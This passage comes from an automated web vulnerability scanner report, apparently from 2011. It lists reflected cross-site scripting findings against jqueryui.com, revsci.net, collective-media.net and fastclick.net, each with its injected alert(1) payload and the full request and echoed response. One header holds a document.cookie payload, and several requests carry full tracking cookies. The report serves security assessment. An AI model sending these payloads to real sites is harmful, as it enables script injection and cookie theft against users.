=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:41:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d550c57"><script>alert(1)</script>7a42f2dba79&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityAct
...[SNIP]...

4.168. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6af50"><script>alert(1)</script>ead3b8dbb77 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f36af50"><script>alert(1)</script>ead3b8dbb77&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:40:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f36af50"><script>alert(1)</script>ead3b8dbb77&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&
...[SNIP]...

4.169. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a1f"><script>alert(1)</script>4dddf997355 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0a6a1f"><script>alert(1)</script>4dddf997355&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0a6a1f"><script>alert(1)</script>4dddf997355&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

4.170. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b042"><script>alert(1)</script>79a0a408cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?9b042"><script>alert(1)</script>79a0a408cd7=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&9b042"><script>alert(1)</script>79a0a408cd7=1" type="text/css" media="all" />
...[SNIP]...

4.171. http://js.revsci.net/gateway/gw.js [bpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 370cd'%3balert(1)//116a8eebeba was submitted in the bpid parameter. This input was echoed as 370cd';alert(1)//116a8eebeba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gateway/gw.js?csid=G07610&bpid=S024%204370cd'%3balert(1)//116a8eebeba HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLvv8iEJPj5n5t4Lxl8gqM+1+kVoa5JUtjw8RivzoP+6DdtaaJZxHI3717ZFmK2ZlsyUeOuq1XEViaeooyTfZUM3DFRjLhZPKW5XYmxNuO+4+rYyDseF5YobgFQCn2cS7aRvMTMvoplsJb6dvG7t3PCR6Rou8l75exTjbBjgseL+XAqHsouMbHMryYHF1wxXZE50wIytk8Q3eKmmpA0exyO99w7z20ofCv9JlxWMNHyralUwaaBqnHaNcF8NLXsy9AB+zs+UcyCKXdEjj3O1C6WOtNb3pH3/jow9FynWUeWw7QSn0aSkoenRcQhxCe63j6D1DByzYPmvyTIGtMnbOmjDploVPBPbrLNCKcbesh+PrRvMnSVXdy05AL22vNX0q4JCOba0b9bOGV8NtCTL9L3/TUIPkLc+apBjqNighdFBh36gkaxuC1c/An57s+87tT5f8png7zjrKl9PcTk3l4Y5RLgIy3GmWmLXFI93zstHlqsJgWd5QlwPCdT76camu9cemH/XJhelupJXy/sB5OGGoHHObI87INpeX0bS1gX3MOhN2NKt5hwZF/B8uoP85q7F0xxRf3ipYj4GZGV7k1/y4mq698jVyTdCsDE0i9Y7Q66bh3+Z4MfhR6lSoSmVAKVIUiWWW4G3/wTqrejoUQCYoQKd4VwE/i4ToD9z5SSr4tny7VPLcN0fTcmjjYo377nxMIFMKDCkOo0XGMGHpNIudWENyCdQ0DrCiXIGV9nuUw8Q3qmUsYwDn/aRc4ciHT0ANjzZVwN53mjStBIjn/S2XdwK13xeoP8pXNfmKCYFrf8pU+0/Yn7gtaIl0ujBFU2ORgQQ2P/Jaf/WlLPAqyPBvwp/X9958EnXYBM2+sm/tx7X2Czc168Jw9LTEmh/A3Gw0ZpetH5orwSKrfqcnwOV1sbSoQxyd1GbYRlqFXI=; rsi_segs_1000000=pUPFekOFbwIUllNab/ezT+71tZc3ltU2c6Ot/evo4ZtovTXUVHSclqCxKr7OS2Tzwu4/ImKEN8BiOobyb3WUFAnv+oHe6qUcrWMruZg9+u2gfzq3cXL5QuB06QtfVNA8x1zeoA1Q4OW3y0hdHSsQb0Nq4ylOyx51VXuI7xeDLFEtKloAjPKQGJsHD2wp8shP4CizzpdqkyYnPP/VZgm2vL/HVZjLwI2vTVOuAtw0dbl8Nx7cbw9B+miy5yfK; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F1rgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S2/PWs9VoKGAMaffRXZIcKsIfI0BwBDjCjZpjEC71nxlYizCu6A+lfGsvTCpuc5/BZCd8dAQtpSxRHzMi6uGYXwHdJ/d8IQUDaybNyCnRbnxo06dBQo6MP+y2flHvCWwRN8R9QUy/ewmRfIY0CQ7gY2Fz5GIodV599nhNMkQuVM5gmbrYq7x5I21/KffdTJpt7T0ZTSX1eK3qBIo7MivlBA41pJ1L7pGL/iJtvadgZSAkPC3F; rsi_us_1000000=pUMd5E+jOAQU7cSkflzeOejf3/ePLz0Psl9qa9zTZ1t6AFynnGN/w2Ipu/wD9QEZclz9FP70Ci3JyeIahZkuXSk0ZtPgX7SFR+DpJQJmZ1vt6IWJuFzbdAIsD16/jT6ASHhy7bMFslLHKeJ4tPxwosYFSAh7XO2qEXKRtA7w5uA5avP9SQDAyg9vXqfo+p88pxe7bY7NGaMBYEjLpAPuVA8NrWMRMs6zd5NORzFDEpHgdM+SmvL5mgc8HvoJe5SJKkbyQ6UOa8YjmPtXy/73vxxd21+SGbzVCMzGPXkvgOJfP5MtgB0puzKLJNbts3At8IarRgu+tapU6Ux1NksnWXnFEHHXenEKOFxTe77WzfHDzv4ktUNcOrx2EHyaG2AoIg4/VXFSuiwTRpvqKyKHnGr/SuGys5aGQEmneqNKfAatpxhIUrEMbXrFSH1acXksX7U2PC5OWTV13bRHdHhb0HTalP9QAeJOrTEjAwL1nwbaQcRBIsAbIJZLRQa9FBlZRsP6aaCzCMDKGbZqir9rlWa30OAzgHB+RRHmP8mfcgjD+rNWI3pyATyYEHBXNWMS6gDnLyXx5pSQhXZJl7xVx3a6RWAV7Vb2ra2zha7EDq5MmWgk2tTFNoY+NcxtAcq4xrm3wIB4Ql4lEMgTuAjMaTbOcYOTIo2oE4Rh8f5J09aacOc39BDnwAYLLIMRadrYuR2SKYEW/xeQd7pIb/OV+Aj2hiJ2VyNAc4AIqT5Y0V6InBy2Tv9GpgfkC8szHcnqQRbdzi8T1UJfoAq/Im3dt4+SkkD79vzAAMzVFYko5bcoQ2jEEs6JEkAzhtfQhi/MUFytF8A6pzEqTYPAw5NT/u1l1UFBZM1GkUNu8lKRa/rn+8H75Y4XcvdPIjqNvKn4ogpFZx4A8pHOl4OGqf3aimsFVTtcfxSFxFYTKQoVuhto/+sqVCd6CyavvSadPnkBST5mX4SZT/MWJFf7Q6+gceiV2A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39VEJKSpv594MC+h4NSwIkXrg8iFszIqKSlFR32KwZT/4WUCcxPfBhIbl1LAehouLXBC92RdEKuDDIxrl9+byKRQ1tSFGNEdAMvIxaEptOGov8eHP4eULpj/amp3rvpWalY8GWAzl9cEduo4cDSQr4DVaR+sHUCPObKN587T0MJzSkJI6BpdASraihB8eWCWO5lEU9viPkCTmlNHmFeoM7MI/Rvu3pnyemxGsyVFQD5SYTy/OlF15s3ytUdKZewMwvkgJDvtrpbMpqL6WTnRIh737bxVmr8fn1Ua+dnyVScuLnY3xgqggOD0iDiQFYutY5Wdlb2ClQFJBfL+1KI7gURS/df0GojlaM8/EHV5vrg8NUjLLVIi0ar5Ow/JtM/ijKgIveL6s0/rfZawyjYPOfJqAwqX1cioUvqJswLi+yh/S6lgHDCurFiGbFL6jT8k0tNmCBm2J2NZOzrownnEptLI93wxPbhDt+zckVV3ayVC0+qae/KwvtN59UX8Ss0DbFWtAz/MZDKra+ejpLAr46p+Y6FuQWwfymfnYfHlBpEj/k/mz1OiXfQkPTnPrsufVHR5tPUw2rIC45YK4y9xLZzL9IERGB60pzCwr7DN8I112gbZd1NP6LtQf31BPLjjWZ6poVa2SEbotCFFRRJD73oRZovi0xdCT+/L9spaG/79s4aJl8iiCoD0wq58NShwQLJw4ThXGKhMt2TVXxg/1yY0XApvLRhxt/r6yO+yyNRZzZ5DT8rKaxtGNv5KNo630V8/9kVLCXQt2AnXriTfJQz6nipoDO68luFBWt3h/rtEYuaZyH04s8Y2yg6kLWdNqHf5PJk9CPUoQVT4ABP2OGqf1VthKvxvSXO0WXzw5RfDcl+x7WTjQ6KaQzxjkNVi0XhWah57OIhBH4jUs9JEEDBC1ZoDBCdxuVsE7FRUYs3OYva8gTd2c75K+bOLOvrv15mMvYiZbIX9F48X2AxlBPzzZdPFNnJeiuMoOHqqMYzq++5E=; Domain=.revsci.net; Expires=Wed, 25-Jan-2012 03:03:33 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Tue, 25 Jan 2011 03:03:33 GMT
Content-Length: 6020

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...
>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S024 4370cd';alert(1)//116a8eebeba');else DM_addEncToLoc("bpid",'S024 4370cd';alert(1)//116a8eebeba');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChi
...[SNIP]...

4.172. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 5d167<script>alert(1)</script>44535fb0da9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K044915d167<script>alert(1)</script>44535fb0da9 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 24 Jan 2011 22:00:49 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 25 Jan 2011 22:00:49 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 22:00:48 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K044915D167<SCRIPT>ALERT(1)</SCRIPT>44535FB0DA9" was not recognized.
*/

4.173. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62922'-alert(1)-'dfd10f1b18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.martini62922'-alert(1)-'dfd10f1b18/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7074
Date: Tue, 25 Jan 2011 16:32:24 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:32:24 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c6a6c02b13; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:32:24 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-39156217_1295973144","http://ad.doubleclick.net//cm.martini62922'-alert(1)-'dfd10f1b18/;net=cm;u=,cm-39156217_1295973144,11de1c6a6c02b13,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

4.174. http://k.collective-media.net/cmadj/cm.martini/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.martini/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad2e'-alert(1)-'58bb6c4d169 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.martini/?7ad2e'-alert(1)-'58bb6c4d169=1 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7078
Date: Tue, 25 Jan 2011 16:31:19 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:31:19 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c5a8d8c269; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:31:19 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-59020176_1295973079","http://ad.doubleclick.net//cm.martini/?7ad2e'-alert(1)-'58bb6c4d169=1;net=cm;u=,cm-59020176_1295973079,11de1c5a8d8c269,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

4.175. http://media.fastclick.net/w/win.bid [asite parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/win.bid

Issue detail

The value of the asite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4105c"><script>alert(1)</script>e3d9cdcedea was submitted in the asite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

